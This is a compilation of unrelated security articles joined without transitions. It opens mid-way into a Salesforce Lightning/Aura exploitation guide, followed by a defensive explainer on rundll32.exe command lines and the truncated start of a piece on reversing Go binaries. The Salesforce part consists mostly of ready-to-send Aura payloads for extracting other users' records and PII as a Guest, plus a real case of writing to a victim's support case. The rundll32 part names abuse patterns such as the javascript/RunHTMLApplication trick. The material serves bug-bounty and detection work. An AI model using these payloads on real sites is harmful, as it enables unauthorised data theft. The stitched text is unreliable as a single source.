Within the repeater tab change the ‘Host’ header and the Burp ‘target’ field to the domain of your target, and we’re ready to go. You’ll notice multiple POST parameters that are consistent across all requests to the aura endpoint, with ‘message’ and ‘aura.token’ being the most import. The ‘message’ parameter contains all of the crucial information such as the apex class and respective method being called, plus parameters (and values) being passed to it. By default it will be URL encoded, however it’s not necessary and will improve readability when decoded. The ‘aura.token’ parameter value will show whether or not you are authenticated. The ‘undefined’ value indicates you are not, and hence you are a Guest user. However if it’s populated with a JWT token, then you are authenticated.

It’s paramount to note that only the ‘message’ parameter in the POST data is to be changed with the payloads, the rest are to remain as they are.

Pull Custom Objects

Replace the ‘message’ parameter value with the following in order to pull custom objects accessible by a Guest user:

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData","callingDescriptor":"UNKNOWN","params":{}}

This will return a list of objects within the ‘apiNamesToKeyPrefixes’ key. Search for ‘__c’ within the response and copy any objects suffixed by this, as we know that these are custom.

Extract Data from Objects

Note: From this point onwards we will be using Intruder quite a bit. Each ‘message’ payload will contain a MARKER value which is what you should surround the Intruder markers with, to save myself repeating it every time.

Send this repeater request to the intruder. Within the ‘Positions’ tab, modify the ‘message’ parameter value to the following:

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"MARKER","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}

The ‘$getItems’ method in this specific controller is only one example of a built-in method that can be used to extract total information from an object, there are plenty however this is the one I typically use. In this payload I’m using pretty much the minimum required parameters for it to work. The full definition for this method and others will be provided at the end of the article. Here’s a little overview of the important parameters:

  • entityNameOrId — Object name
  • getCount — if set to ‘true’, will return the number of records returned
  • pageSize — The larger the number, the greater potential number of records returned. Capped at 1000.
  • currentPage — If you’ve capped the pageSize but there are more records, incrementing the currentPage value will return the records for the next page

Once you’re happy with these values, ensure that the ‘MARKER’ string is surrounded by the intruder markers. Within the ‘Payloads’ tab, paste the custom objects into the Simple List, along with the following:

Case
Account
User
Contact
Document
ContentDocument
ContentVersion
ContentBody
CaseComment
Note
Employee
Attachment
EmailMessage
CaseExternalDocument
Attachment
Lead
Name
EmailTemplate
EmailMessageRelation


A full list of default Salesforce objects can be found here, as there is likely some I am missing.

Finally, start the attack! Once the attack is complete, I would re-order it by response length from highest to lowest, as responses of <12,000 typically are either:

  1. You do not have access to the object
  2. The only record returned is your own (Guest)

Below is an example `User` object in which the response length indicates a leak:

example_user.PNG

Certain fields in the ‘User’ object will contain null, as they were either not supplied or have additional restrictions as a result of a Salesforce security update as mentioned before. But PII is nearly always available through the ‘Name’, ‘FirstName’, ‘LastName’ fields and occasionally ‘Phone’. In addition to this, some custom fields may be disclosed. Prior to reporting this issue, it’s paramount to ensure this information is not already accessible publicly. If the community has a discussion board where users can post from profiles, this information is likely already accessible. So ensure that throughout the exploitation process, you are not reporting a ‘non issue’.

Specific objects will return IDs, particularly those related to attachments. Here is how to utilise them (These paths are relative to the base path, not the aura endpoint):

  • Document — Prefix 015 — /servlet/servlet.FileDownload?file=ID
  • ContentDocument — Prefix 069 — /sfc/servlet.shepherd/document/download/ID
  • ContentVersion — Prefix 068 — /sfc/servlet.shepherd/version/download/ID

A list of default object ID prefixes can be found here.

Exploiting ListViews

The aim here is to retrieve ListView Ids for the aforementioned sensitive objects, query them for records within the object, and lastly access the record directly. The default view for Lightning as of current is the ‘Recently Viewed’ ListView. Modify the ‘message’ parameter in the Intruder tab to the following, keep the Intruder payloads the same as before:

  1. Get ListView ID
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.listViewPickerDataProvider.ListViewPickerDataProviderController/ACTION$getInitialListViews","callingDescriptor":"UNKNOWN","params":{"scope":"MARKER","listIdOrApiName":"Recent","listViewTitle":"Recently Viewed","maxMruResults":50,"maxAllResults":100}}]}

2. Copy the ListView records (prefix 00B) and replace the entire intruder payloads with them. In this case, don’t forget to modify the ‘entityName‘ parameter value from ‘OBJECT’ to the object that the ListView records belong to, such as ‘User’. Then, replace the ‘message’ parameter value with the following:

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.listViewDataManager.ListViewDataManagerController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"filterName":"MARKER","entityName":"OBJECT","pageSize":100,"layoutType":"LIST","getCount":false,"enableRowActions":false,"offset":0}}]}

3. Lastly, any IDs returned you can attempt to access directly. Copy any IDs returned and replace the Intruder payload list with them. The final ‘message’ parameter value to extract a user’s record is below:

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord","callingDescriptor":"UNKNOWN","params":{"recordId":"MARKER","mode":"VIEW","layoutType":"FULL"}}]}

The alternative to this would be to extract all of the ListView IDs from the ‘ListView’ default object, then attempting to pair each ListView record to a corresponding object using the query from step 2.

Interacting with Apex Class Methods

Thus far, everything has been quite straightforward and that process will not change for any target. The ability to exploit these insecure methods will separate the wheat from the chaff. First things first, a basic understanding of how to efficiently understand these from a blackbox perspective is important.

When filtering through your Burp Proxy history, or sliding down a mass of requests, there are two simple ways to find any custom apex class definitions or calls:

  1. The string ‘apex%3a%2f%2f’ in the request
  2. The string ‘compound://c’ in the response

I will focus on the second, as ultimately any apex call that is made in a background request will lead you to look for the actual descriptor itself anyway.

Below is an snippet of what you may come across in a response when searching for this string:

"componentDefs":[
{"xs":"G","descriptor":"markup://c:SampleComponent"
..snip..
"cd":{
      "descriptor":"compound://c.SampleComponent",
      "ac":[
        { 
           "n":"getBaseUrl",
           "descriptor":"apex://SampleController/ACTION$getBaseUrl","at":"SERVER","rt":"apex://Map<String,String>",
           "pa":[{"name":"url","type":"apex://String"}]
..snip..

The important values to note here are:

  • The initial ‘discriptor’ value that exists in ‘componentDefs’ — This can be used for retrieving the full definition, although not required. The descriptor format is made up of namespace:component.
  • rt — The return value type. In this case, it’s a Map.
  • pa — Parameters that are passed to the apex class method, and their type. Here the parameter accepted is “url” of type “String”.

Knowing this information, we can attempt to interact with this method and see what it returns. Here’s the constructed message value:

{"actions":[{"id":"46;a","descriptor":"apex://NovaBaseController/ACTION$getBaseUrl","callingDescriptor":"UNKNOWN","params":{"url":"https://google.com/something"}}]}

Let’s break this down into points:

  • id — Completely irrelevant, enter 1337 here if it makes you feel better
  • descriptor — The controller and subsequent method we are calling
  • callingDescriptor — Okay, so technically in an ideal world this would contain the componentDef markup string, but I have not seen it ever required so “UNKNOWN” is accepted across the board
  • params — This JSON object contains the ‘url’ parameter and value that I’ve decided to give it, which is a URL. I simply looked at the parameter name and took a wild guess, welcome to hacking 🙂

Submitting the request returned the following value:

"returnValue":{
     "completeUrl":"https://google.com/something",
     "pathUrl":"/something"
     }

Some of you may be thinking “When searching for custom apex classes, the responses are so cluttered and it’s hard to focus. How do I see JUST the methods for a particular custom class?”. This can be retrieved via the ‘/auraCmpDef’ endpoint. The endpoint itself requires a few pieces of information prior to accessing it, as seen below:

/auraCmpDef?aura.app=<APP_MARKUP>&_au=<AU_VALUE>&_ff=DESKTOP&_l=true&_cssvar=false&_c=false&_l10n=en_US&_style=-1450740311&_density=VIEW_ONE&_def=<COMPONENT_MARKUP>

The values for these ‘aura.app’ and ‘_au’ parameters can be found in two places. side by side. Firstly when a call to a particular method of a class is called in a request, it can be found in the ‘aura.context’ POST parameter’s value. Secondly, in the response that describes the custom class itself (CTRL+F ‘Application@’):

In the example request above, the ‘aura.app’ value is ‘markup://siteforce:communityApp’ and the _au value is ‘8KVdMoLuAGi15YkxlC35vw’. Lastly is the component descriptor value is required for the ‘_def’ parameter,and you may have noticed one earlier in this subsection. Search for ‘»descriptor»:»markup://c’ in the response where these methods are outlined, and copy the entire value for the descriptor.

descriptor.PNG

Plugging in these values would leave us with the following finished path & parameters (Note that the ‘/auraCmpDef’ endpoint is in the same directory as ‘/aura’ is found):

/auraCmpDef?aura.app=markup://siteforce:communityApp&_au=8KVdMoLuAGi15YkxlC35vw&_ff=DESKTOP&_l=true&_cssvar=false&_c=false&_l10n=en_US&_style=-1450740311&_density=VIEW_ONE&_def=markup://c:NOVABaseComponent

Navigating to the URL will perform a 302 redirect to what we seek. Below is a snippet ‘/auraCmpDef’ output for a built-in method within a component.

Example method description from ‘/auraCmpDef’ for the built in ‘forceSearch:resultsGridLVMDataManager’   It’s bad enough that you’re often guessing parameter values for parameters of a String type, but even worse are parameters which expect an object, as you’re now dealing with potentially quite a few blind parameters within said object itself and their respective values. Here’s a fairly obvious and handy trick for this. If an object is expecting a return type of ‘aura://User’, check to see if any other apex methods have a ‘rt’ value of ‘aura://User’, and then use the output from that method as the input for the first.
Example method description from ‘/auraCmpDef’ for the built in ‘forceSearch:resultsGridLVMDataManager’ It’s bad enough that you’re often guessing parameter values for parameters of a String type, but even worse are parameters which expect an object, as you’re now dealing with potentially quite a few blind parameters within said object itself and their respective values. Here’s a fairly obvious and handy trick for this. If an object is expecting a return type of ‘aura://User’, check to see if any other apex methods have a ‘rt’ value of ‘aura://User’, and then use the output from that method as the input for the first.

Putting that all together

Now that you’re able to extract data from objects and interact with apex classes, below is a real issue I’ve found which paired the two:

  1. Fetched custom objects and attempted to extract data from each using the getItems method of SelectableListDataProviderController. Object ‘Case_Files__c’ disclosed a Case record ID (Id), case number (caseNum), and S3 bucket file location for case files (acl was private), for all user created support cases.
  2. Authenticating to the application and submitting my own case file while proxying through Burp disclosed the a number of methods for a custom apex class in a response. In addition these methods were being used when I attached my own case files, and as such I was able to have a greater understanding of their functionality based on inputs that were populated by components automatically and the ‘returnValue’ JSON object in the respective responses of these requests:comBucketAttachmentController/ACTION$insertAttach — Uploads the file specified to the case (in conjunction with a POST request to the S3 bucket)
    comBucketAttachmentController/ACTION$updateCaseStatus — Updates the case status (saves it)
    comBucketAttachmentController/ACTION$getCaseAttachments — Shows case attachments for a given case.
  3. The insertAttach method took several parameters such as file size, file name, bucket name etc et al. But most interesting were ‘caseNumber’ and ‘caseId’ parameters of type ‘aura://String’. Since I already had an example image on the S3 bucket, I attempted to use another user’s case information leaked in the ‘Case_Files__c’ object without making having to make a POST request to the bucket. Swapping my ‘caseNumber’ with their ‘caseNum’ value, and ‘caseId’ with their ‘Id’ value from the custom object, I submitted a request and received the same success-style response that I had received when attaching files to my own case (“returnValue”:”success”).
  4. In order to save the file to the case, updateCaseStatus was used which took only a ‘caseId’ parameter. Using the same victim’s Case record ID as the last request, I received a ‘Status Changed’ response. Sensitive identifying information redacted, below is the exact payload used. Notice that I called two apex class methods in the one request, as you are able to call multiple methods within the one message:
{"actions":[{"id":"579;a","descriptor":"apex://comBucketAttachmentController/ACTION$insertAttach","callingDescriptor":"UNKNOWN","params":{"caseId":"<VICTIM CASE ID>","filename":"dog.jpg","bucket":"redacted-support","caseNumber":"<VICTIM CASE NUMBER>","fileType":"image/jpeg","fileSize":"28.8 KB","fileFinal":"dog.20201007-174332.jpg","accountName":"Aaron Costello"}},{"id":"580;a","descriptor":"apex://comBucketAttachmentController/ACTION$updateCaseStatus","callingDescriptor":"UNKNOWN","params":{"caseID":"<VICTIM CASE ID>"}}]}

5. In order to confirm that it was successful, the getCaseAttachments method was used like so:

{"actions":[{"id":"2447;a","descriptor":"apex://comBucketAttachmentController/ACTION$getCaseAttachments","callingDescriptor":"UNKNOWN","params":{"caseId":"<VICTIM CASE ID>"}}]}

6. Result showing that the file was added to the victim’s case (victim info redacted):

case.png

Security Updates

As mentioned in the “How does Salesforce implement security?” section, Saleforce seasonally role out important updates to will apply to new communities and can be pushed to existing ones. These updates can, and will, effect the impact of Salesforce misconfiguration findings. As such it’s vitally important be aware of changes being made. These release notes can be found here. Relevant sections for this article will be ‘Security, Privacy, and Identity’ and also ‘Communities’. Most of the time, these updates will address the Guest user and their accessibility to specific fields in an object or their ability to interact with “@AuraEnabled” methods. I will do my best to update this section with any significant changes in the future that may affect exploitability in any way.

Spring’21:

  • View All Users Permission to be Removed — Specifically for Guest users. This will affect the visibility Guest users’ have. This permission was disabled in Summer’20 and is to be removed now

Winter’21:

  • Secure Guest User Record Can’t Be Disabled — Private org-wide defaults for guest users & restrictions on the ability to grant record access to them. Unlike before where this could be ‘unchecked’, this update will remove that option and it will be mandatory.
  • Reduce Object Permissions for Guest Users — Disables the following object permissions for Guests: View All Data, Modify All Data, Edit, and Delete.
  • Let Guest Users See Other Members of This Community Setting Disabled — The ability for admins to grant Guest users visibility on other users can reveal PII information, and as such this setting will be turned off by default
  • Improved Security for Managed Topic Images — Communities before Winter’21 have managed topic images stored as documents and are publicly accessible, even if the community is intended to be private. This update will now have these images stored as private.

Payload Glossary

A compiled list of payloads I have discovered over a period of reconnaissance and exploitation of communities. If there are any useful built-in controller methods that are missing, I’d love if you reached out and I will add it here with credit.


SelectableListDataProviderController/ACTION$getItems — Returns pageSize amount of records from all fields in a specific object.

  • entityNameOrId — Object name
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"MARKER","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}

HostConfigController/ACTION$getConfigData — Returns all currently available objects

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData","callingDescriptor":"UNKNOWN","params":{}}

ProfileMenuController/ACTION$getProfileMenuResponse — Returns minor current user details

{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.self.service.components.profileMenu.ProfileMenuController/ACTION$getProfileMenuResponse","callingDescriptor":"UNKNOWN","params":{}}]}

ScopedResultsDataProviderController/ACTION$getLookupItems — Returns pageSize amount of records for a particular object that includes a specific term in a row.

  • scope — Object name
  • term — Search term, minimum 4 characters
  • additionalFields — Any other fields in the object that you wish to be returned in the record
Definition - /auraCmpDef?aura.app=markup://siteforce:communityApp&_au=<VALUE>&_def=markup://forceSearch:resultsGridLVMDataManager
Payload - {"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.search.components.forcesearch.scopedresultsdataprovider.ScopedResultsDataProviderController/ACTION$getLookupItems","callingDescriptor":"UNKNOWN","params":{"scope":"User","term":"script","pageSize":10,"currentPage":1,"enableRowActions":false,"additionalFields":[],"useADS":false}}]}

ListViewPickerDataProviderController/ACTION$getInitialListViews — Returns list views available for a given object from the ‘Recent’ list ID

  • scope — Object name
  • listIdOrApiName — ID of ListView to query
  • listViewTitle — Title of ListView to query
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.listViewPickerDataProvider.ListViewPickerDataProviderController/ACTION$getInitialListViews","callingDescriptor":"UNKNOWN","params":{"scope":"Contact","listIdOrApiName":"Recent","listViewTitle":"Recently Viewed","maxMruResults":100,"maxAllResults":100}}]}

ListViewDataManagerController/ACTION$getItems — Returns records available from a given ListView ID

  • filterName — ID of ListView to query
  • entityName — Object name
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.listViewDataManager.ListViewDataManagerController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"filterName":"<LISTVIEW_ID>","entityName":"<OBJECT NAME>","pageSize":100,"layoutType":"LIST","sortBy":null,"getCount":true,"enableRowActions":false,"offset":0}}]}

DetailController/ACTION$getRecord — Returns the data in a given record ID

  • recordId — ID of the record to query
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord","callingDescriptor":"UNKNOWN","params":{"recordId":"<RECORD_ID>","record":null,"inContextOfComponent":"","mode":"VIEW","layoutType":"FULL","defaultFieldValues":null,"navigationLocation":"LIST_VIEW_ROW"}}]}

ApexActionController/ACTION$execute — Alternative way to call an apex class method

  • classname — Name of apex class
  • method — Method being called
  • params — Parameter and value pairs taken by method
{"actions":[{"id":"123;a","descriptor":"aura://ApexActionController/ACTION$execute","callingDescriptor":"UNKNOWN","params":{"namespace":"","classname":"<APEX_CLASSNAME>","method":"<APEX_METHOD>","params":{},"cacheable":false,"isContinuation":false}}]}

Vulnerability Report Templates

If you’re going to use the information in this article to submit reports on bug bounty platforms or via responsible disclosure, I’d appreciate for the sake of security teams everywhere if you’d be considerate enough to put effort into the report document. I have taken the liberty of providing some templates below that you may use. Note that the following templates are formatted with Markdown, as this is commonly supported among BB platforms. Naturally the information in these template should be changed where necessary and are just ‘general’ templates for object and apex class method misconfigurations. Text that definitely needs to be changed has been surrounded by ‘\*\*’.

Insecure Object Permissions for Guest User

**Title:** [salesforce.site.com] Insecure Salesforce default/custom object permissions leads to information disclosure

* **Risk:** \*Low/Medium/High\*
* **Impact:** \*Low/Medium/High\*
* **Exploitability:** \*Low/Medium/High\*
* **CVSSv3:** \*CVSS_Score\* \*CVSS_STRING\*

**Target:** The Salesforce Lightning instance at `https://salesforce.example.com`.

**Impact:** The Salesforce Lightning instance does not enforce sufficient authorization checks when specific objects are requested. As such, an unauthenticated attacker may be able to extract sensitive data from the records in these objects which contains information of other users. This includes X,Y,Z in addition to other information.

**Description:** The web application at `https://salesforce.example.com` is built using [Salesforce Lightning](https://www.salesforce.com/eu/campaign/lightning/). Salesforce Lightning is a CRM for developing web applications providing a number of abstractions to simplify the development of data-driven applications. In particular, the [Aura](https://developer.salesforce.com/docs/component-library/bundle/aura:component) framework enables developers to build applications using reusable components exposing an API in order for the components to interact with the application.

During testing it was discovered that the Salesforce Lightning instance has loose permissions on the X,Y,Z objects for unauthenticated `Guest` users.

Therefore, a malicious attacker may be able to extract sensitive information belonging to other users of the application. To do this, an unauthenticated attacker may craft a HTTP request directly to the Aura API at `https://salesforce.site.com/s/sfsites/aura`, using built-in controller methods normally used by the Salesforce Lightning components. 

**Steps to Reproduce:**

1) Ensure Burp Suite is sniffing all HTTP(S) requests in the background
2) Navigate to `https://aaroncostello-developer-edition.eu45.force.com/`, this is to retrieve a template aura request for use
3) Find a POST request in Burp's Proxy history to the `/s/sfsites/aura` endpoint. Send it to the repeater
4) Modify both the `Host` header and Burp's target field to `salesforce.example.com`
5) Change the `message` POST parameter to the payload below. Please note that all other parameters should remain untouched, and that in this example payload, a pageSize of 100 is used for speed however more records can be retrieved:

```
{"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"<OBJECT>","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}
```

6) Submit the request
7) The response contains sensitive information belonging to other users, an example screenshot has been provided below:

{{Screenshot}}

**Remediation:** Enforce [record level security (RLS)](https://help.salesforce.com/articleView?id=security_data_access.htm&type=5
) on the vulnerable object to ensure records are only able to be retrieved by the record owner, and privileged users of the application.

Insecure CRUD permissions on custom Apex class method

**Title:** [salesforce.site.com] Insecure CRUD permissions on custom Apex class method

* **Risk:** \*Low/Medium/High\*
* **Impact:** \*Low/Medium/High\*
* **Exploitability:** \*Low/Medium/High\*
* **CVSSv3:** \*CVSS_Score\* \*CVSS_STRING\*

**Target:** The Salesforce Lightning instance at `https://salesforce.example.com`.

**Impact:** The Salesforce Lightning instance is implementing a custom class. One of the methods of this class does not carry-out sufficient CRUD permission checks. As such, an unauthenticated attacker can abuse this method in order to extract data from sensitive fields which are normally not accessible when accessed directly using built-in controller methods.

**Description:** The web application at `https://salesforce.example.com` is built using [Salesforce Lightning](https://www.salesforce.com/eu/campaign/lightning/). Salesforce Lightning is a CRM for developing web applications providing a number of abstractions to simplify the development of data-driven applications. In particular, the [Aura](https://developer.salesforce.com/docs/component-library/bundle/aura:component) framework enables developers to build applications using reusable components exposing an API in order for the components to interact with the application.

During testing it was discovered that the Salesforce Lightning instance has been customized to include a custom class, and method. Namely: \*`apex://ChangeMeController/ACTION$changeMe`\*. This method takes the `\*X\*` and `\*Y\*` parameters as input. 

When called, this method queries the instance for `\*Z\*` using the `\*X\*` and `\*Y\*` parameters, and returns a value in the response. However, the method does not carry out sufficient authorization checks to determine if the \*object/field/record\* requested should be accessible to the user and as such, an attacker may be able to list the values in the \*object/field/record\* for which they do not normally have the permissions to view.

**Steps to Reproduce:**

1) Ensure Burp Suite is sniffing all HTTP(S) requests in the background
2) Navigate to `https://aaroncostello-developer-edition.eu45.force.com/`, this is to retrieve a template aura request for use
3) Find a POST request in Burp's Proxy history to the `/s/sfsites/aura` endpoint. Send it to the repeater
4) Modify both the `Host` header and Burp's target field to `salesforce.example.com`
5) Change the `message` POST parameter to the payload below. Please note that all other parameters should remain untouched, and that in this example payload, a pageSize of 100 is used for speed however more records can be retrieved:

```
{"actions":[{"id":"123;a","descriptor":"apex://ChangeMeController/ACTION$changeMe","callingDescriptor":"UNKNOWN","params":{"<PARAM1>":"<VAL1>","<PARAM2>":"<VAL2>"}}]}
```

6) Submit the request
7) The response contains sensitive information belonging to other users, an example screenshot has been provided below:

{{Screenshot}}

**Remediation:** Modify the `changeMe` method to ensure that the user is authorized to view the request

A Deep Dive Into RUNDLL32.EXE

A Deep Dive Into RUNDLL32.EXE

Original text by Nasreddine Bencherchali

Image for post
When threat hunting malware one of the key skills to have is an understanding of the platform and the OS. To make the distinction between the good and the bad one has to know what’s good first.
On windows this can be a little tricky to achieve because of the complexity of the OS (after all it’s a 30+ years’ operating system).
Knowing this fact, malware authors write their malware to mimic normal windows processes. So you’ll see malware disguising itself as an “svchost.exe”, “rundll32.exe” or “lsass.exe” process, exploiting the fact that the majority of people using windows don’t know how these system processes behave in normal conditions.
Last time we’ve talked about the “svchost.exe” process and its command line options.

Demystifying the “SVCHOST.EXE” Process and Its Command Line OptionsUnderstanding the “svchost.exe” process and its command line optionsmedium.com

Today however we’ll be taking a look at “rundll32.exe” and understanding a little bit more about it.

RUNDLL32.EXE

As the name suggest, the “rundll32.exe” executable is used to “RUN DLL’s” or Dynamic Link Libraries (Below is the definition of a DLL from MSDN).

dynamic-link library (DLL) is a module that contains functions and data that can be used by another module (application or DLL) — MSDN

The most basic syntax for using “rundll32.exe” is the following.

rundll32 <DLLname>

The “rundll32.exe” executable can be a child or a parent process, it all depend on the context of the execution. And to determine if an instance of “rundll32.exe” is malicious or not we need to take a look at a couple of things. First is the path from which its being launched and second is its command line.

The valid “RUNDLL32.EXE” process is always located at:

\Windows\System32\rundll32.exe
\Windows\SysWOW64\rundll32.exe (32bit version on 64bit systems)

As for the command line of a “rundll32.exe” instance it all depends on what’s being launched whether be it a CPL file, a DLL install…etc.

For this let’s take a look at a couple of examples.

Running a DLL

In its basic form, “rundll32.exe” will just execute a DLL, so the first thing to check when seeing an instance of “rundll32.exe” is the legitimacy of the DLL being called.

Always check the location from where the DLL is called, for example kernel32.dll being called from %temp% is obviously malicious. And as a side note always check the hash on sites like VT.

SHELL32.DLL — “OpenAs_RunDLL”

“rundll32.exe” can also execute specific functions in DLL’s. For example, when selecting a file and performing a right click on it, a context menu will be shown that offers multiple options. One of the options is the “OpenWith” option. Once selected a pop-up will appear that’ll let’s select from a set of applications on the system.

Behind the scene this is actually launching the “rundll32.exe” utility with the “shell32.dll” and the “OpenAs_RunDLL” function.

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL <file_path>

This behavior of calling specific functions in a DLL is very common and it can be tricky to know all of them in advance. Below is a list containing a batch of “rundll32.exe” calls and their meaning.

SHELL32.DLL — “Control_RunDLL”, “Control_RunDLLAsUser” and Control Panel Applets

Image for post

Another common function we’ll see used with the “shell32.dll” is “Control_RunDLL” / “Control_RunDLLAsUser”. These two are used to run “.CPL” files or control panel items.

For example, when we want to change the Date and Time of the computer we launch the applet from the control panel.

Image for post

Behind the scene, windows launched a “rundll32.exe” instance with the following command line.

C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\timedate.cpl

In addition to verifying the legitimacy of a DLL. When using the “Control_RunDLL” / “Control_RunDLLAsUser” functions, you should always check the legitimacy of a “.CPL” file.

Control Panel Items (.CPL)

CPL or Control Panel Items are programs that represent a functionality provided by the control panel or in other terms, they are DLL’s that exports the CPIApplet Function.

A “.CPL” file can contain multiple applets that can be referred to by an applet index and each applet can contain multiple tabs that can be referred to by a tab index.

We can access and request this information via the “rundll32.exe” utility as follow.

Image for post

For example, the “main.cpl” file in the System32 folder contains two applets. The “Mouse” and “Keyboard” properties. If we want to access the mouse properties and change the pointer, we’ll do it like this.

C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\main.cpl,@0,1

As you can see, one can easily replace the “main.cpl” file with a malicious version and come by unnoticed to the untrained eye. In fact, that’s what malware authors have been doing to infect users.

In a normal case scenario, the parent process of a “rundll32.exe” instance with the “Control_RunDLL” function should be “explorer.exe” or “control.exe”

Other processes can also launch “rundll32.exe” with that function. For example, it can be a child of “Google Chrom”“MSGEDGE” or “IE” when launching the “inetcpl.cpl” for proxy / network configuration.

If you want more details about CPL and how malware is using it, you can read this trend micro research paper called CPL Malware.

DEVCLNT.DLL — “DavSetCookie” (Web Dav Client)

One of the mysterious command lines in a “rundll32.exe” instance that’ll show up a lot in the logs, takes the following format.

C:\WINDOWS\System32\rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie <Host> <Share>

When using the “file://” protocol, whether be it in a word file, or via share windows will sometimes use (if SMB is disabled in some cases) the WebDav Client to request these files. When that happens a request will be made via the “rundll32.exe” utility.

The parent process of such requests will be “svchost.exe” like so. (The “-s WebClient” is not obligatory)

C:\Windows\system32\svchost.exe -k LocalService -p -s WebClient

Malware like Emotet has already used this technique in the past. So always analyze the host that is present in this type of command line and make sure that everything is legitimate.

RUNDLL32.EXE — “-sta” / “-localserver” Flags

A lesser known command line arguments are the “-sta” and “-localserver”. Which both can be used to load malicious registered COM objects.

If you see in your logs or a process running with one of the following command line arguments.

rundll32.exe –localserver <CLSID_GUID>
rundll32.exe –sta <CLSID_GUID>

You need to verify the corresponding registry key [\HKEY_CLASSES_ROOT\CLSID\<GUID>] and its sub-keys and values for any malicious DLL or SCT script.

I highly suggest you read @bohops blog post for a detailed explanation on this technique and check hexacorn blog for the “-localserver” variant.Abusing the COM Registry Structure: CLSID, LocalServer32, &amp; InprocServer32TL;DR Vendors are notorious for including and/or leaving behind Registry artifacts that could potentially be abused by…bohops.com

RUNDLL32.EXE — Executing HTML / JAVASCRIPT

One other command line argument that attackers may use with “rundll32.exe” is the “javascript” flag.

In fact a “rundll32.exe” instance can run HTML / JavaScript code using the “mshtml.dll” and the “javascript” keyword (See Below).

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication <HTML Code>

I’ve never seen this used in a legitimate way. So if you spot this in your logs, it is worth investigating.

You can check the following resources to learn more about this technique.

Conclusion

Thanks for reading and I hope you enjoyed this quick look at Rundll32.

If you have any feedback or suggestions, send them my way via twitter @nas_bench

References

Reverse Engineering Go Binaries with Ghidra

Reverse Engineering Go Binaries with Ghidra

Original text by Dorka Palotay

Go (also called Golang) is an open source programming language designed by Google in 2007 and made available to the public in 2012. It gained popularity among developers over the years, but it’s not always used for good purposes. As it often happens, it attracts the attention of malware developers as well.

Using Go is a tempting choice for malware developers because it supports cross-compiling to run binaries on various operating systems. Compiling the same code for all major platforms (Windows, Linux, macOS) make the attacker’s life much easier, as they don’t have to develop and maintain different codebases for each target environment.

The Need to Reverse Engineer Go Binaries

Some features of the Go programming language give reverse engineers a hard time when investigating Go binaries. Reverse engineering tools (e.g. disassemblers) can do a great job analyzing binaries that are written in more popular languages (e.g. C, C++, .NET), but Go creates new challenges that make the analysis more cumbersome.

Go binaries are usually statically linked, which means that all of the necessary libraries are included in the compiled binary. This results in large binaries, which make malware distribution more difficult for the attackers. On the other hand, some security products also have issues handling large files. That means large binaries can help malware avoid detection. The other advantage of statically linked binaries for the attackers is that the malware can run on the target systems without dependency issues.

As we saw a continuous growth of malware written in Go and expect more malware families to emerge, we decided to dive deeper into the Go programming language and enhance our toolset to become more effective in investigating Go malware.

In this article, I will discuss two difficulties that reverse engineers face during Go binary analysis and show how we solve them.

Ghidra is an open source reverse engineering tool developed by the National Security Agency, which we frequently use for static malware analysis. It is possible to create custom scripts and plugins for Ghidra to provide specific functionalities that researchers need. We used this feature of Ghidra and created custom scripts to aid our Go binary analysis.

The topics discussed in this article were presented at the Hacktivity2020 online conference. The slides and other materials are available in our Github repository.

Lost Function Names in Stripped Binaries

The first issue is not specific to Go binaries, but stripped binaries in general. Compiled executable files can contain debug symbols which make debugging and analysis easier. When analysts reverse engineer a program that was compiled with debugging information, they can see not only memory addresses, but also the names of the routines and variables. However, malware authors usually compile files without this information, creating so-called stripped binaries. They do this to reduce the size of the file and make reverse engineering more difficult. When working with stripped binaries, analysts cannot rely on the function names to help them find their way around the code. With statically linked Go binaries, where all the necessary libraries are included, the analysis can slow down significantly.

To illustrate this issue, we used simple “Hello Hacktivity” examples written in C[1] and Go[2] for comparison and compiled them to stripped binaries. Note the size difference between the two executables.

c and go comparison executables

Ghidra’s Functions window lists all functions defined within the binaries. In the non-stripped versions function names are nicely visible and are of great help for reverse engineers.Ghidra functions list

Figure 1 – hello_c[3] function listghidra functions list golang

Figure 2 – hello_go[5] function list

The function lists for stripped binaries look like the following:ghidra functions list c stripped binary

Figure 3 – hello_c_strip[4] function listghidra functions list go stripped binary

Figure 4 – hello_go_strip[6] function list

